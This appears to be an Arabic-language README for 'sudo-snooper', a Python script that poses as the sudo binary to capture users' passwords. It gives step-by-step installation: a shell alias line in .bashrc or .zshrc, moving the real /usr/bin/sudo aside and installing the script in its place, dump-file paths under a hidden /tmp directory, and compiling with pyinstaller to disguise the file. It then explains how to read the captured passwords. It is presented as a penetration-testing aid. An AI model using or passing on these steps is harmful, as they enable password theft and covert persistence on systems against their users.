
نص Python يعمل مثل ثنائي sudo الأصلي لخداع المستخدمين لإدخال كلمات مرورهم
يعمل sudo-snooper مثل الثنائي الأصلي sudo لخداع المستخدمين لإدخال كلمات المرور الخاصة بهم.
سيظهر للمستخدم موجهًا مزيفًا تمامًا مثل الأصلي لإدخال كلمة مرور sudo.
يمكن أن يكون هذا مفيدًا في اختبارات الاختراق أو التقييمات الأمنية لاختبار معرفة المستخدم.
هذا الخيار أسهل في التنفيذ وأكثر قابلية للنقل، لكنه قد يكون أكثر وضوحًا للمستخدمين الحريصين.
قم بتحرير ملف .rc الخاص بالصدفة التي يستخدمها المستخدم (يمكن أن يكون .bashrc .zshrc وما إلى ذلك) وأضف ما يلي:
alias sudo='python3 /path/to/sudo-snooper.py'
تأكد من أن sudo-snooper.py لديه الأذونات الصحيحة.
تحتاج إلى صلاحيات الجذر لخيار التثبيت هذا
يصبح هذا مفيدًا فقط إذا كان لديك بالفعل صلاحيات الجذر ولكن لا يمكنك كسر التجزئات من /etc/shadow لسبب ما. بشكل أساسي يمكنك اصطياد كلمة مرور المستخدم منهم.
# mv /usr/bin/sudo /usr/bin/somename
قم بتغيير هذه في sudo-snooper.py:
dumpdir = "/tmp/.snooper"
dumpfile = "/tmp/.snooper/dump.txt"
sudo = 'sudo'
# install -dm755 sudo-snooper.py /usr/bin/sudo
إعطاء الأذونات اللازمة لملف البايثون
يمكنك أن تكون مبتكرًا هنا وتجعل ملفًا قابلاً للتنفيذ غير قابل للقراءة للمستخدمين، لكنني لن أخوض في ذلك. تحقق من بعض الإجابات هنا لذلك.
ملاحظة: طريقة أكثر إقناعًا قليلاً لتثبيت هذا هي تجميعه باستخدام pyinstaller بحيث لا يظهر كملف بايثون عند تنفيذ file /usr/bin/sudo.
للقيام بذلك تحت Archlinux: pyinstaller --onefile sudo-snooper.py سيعمل. ومع ذلك يرجى ملاحظة أنه بمجرد التجميع لن تتمكن من تغيير المعلمات في الثنائي المترجم.
بمجرد التثبيت، يمكن استدعاء sudo-snooper تمامًا مثل sudo العادي.
على سبيل المثال، تشغيل
sudo vim /etc/resolv.conf
سيؤدي إلى استدعاء sudo-snooper (بافتراض أنه مثبت بشكل صحيح).
سيطلب كلمة مرور المستخدم ثم ينفذ الأمر عن طريق إعادة التوجيه إلى الثنائي sudo الحقيقي إذا كانت كلمة المرور صحيحة.
يمكنك بعد ذلك استرجاع كلمة مرور المستخدم عن طريق قراءة ملف التفريغ في الإعدادات.